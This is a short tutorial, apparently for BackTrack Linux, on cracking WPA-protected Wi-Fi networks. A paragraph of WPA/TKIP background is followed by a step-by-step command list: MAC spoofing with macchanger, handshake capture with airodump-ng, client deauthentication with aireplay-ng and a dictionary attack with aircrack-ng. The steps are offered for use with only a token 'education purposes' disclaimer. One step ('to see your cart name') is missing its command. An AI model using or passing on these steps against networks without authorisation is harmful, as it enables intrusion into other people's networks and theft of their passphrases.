BackTrack Tutorial – How to crack WPA
In this Tutorial, I show how to crack a wireless network secured with WPA encryption. Although it may sound hard, it is actually quite easier than you may think.
This information should only be used for education purposes.
The WPA protocol implements the majority of the IEEE 802.11i standard. The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the preparation of 802.11i. Specifically, the Temporal Key Integrity Protocol (TKIP), was brought into WPA. TKIP could be implemented on pre-WPA wireless network interface cards that began shipping as far back as 1999 through firmware upgrades. Because the changes required fewer modifications on the client than on the wireless access points (APs), most pre-2003 APs could not be upgraded to support WPA with TKIP. Researchers have since discovered a flaw in TKIP that relied on older weaknesses to retrieve the keystream from short packets to use for re-injection and spoofing.
Here are the commands :
to see your cart name
airmon-ng stop [wireless card name]
ifconfig [wireless card name] down
macchanger --mac 00:11:22:33:44:55 [wireless card name]
airmon-ng start [wireless card name]
airodump-ng [wireless card name]
- start sniffing , to stop sniffing pres ctrl+c
airodump-ng -c (channel) -w [filename] --bssid (paste AP's mac here) [wireless card name]
Open a new KONSOLE:
aireplay-ng -0 5 -a (paste AP's mac here) [wireless card name]
aircrack-ng (filename-01.cap)-w (dictionary location)
aircrack-ng is going to allow us to take the WPA captured passphrase, and will use our ESSID along with every entry in our Dictionary list, to try and “guess” the password.
If you have questions please ask in the comments!BackTrack Tutorial – How to crack WPA,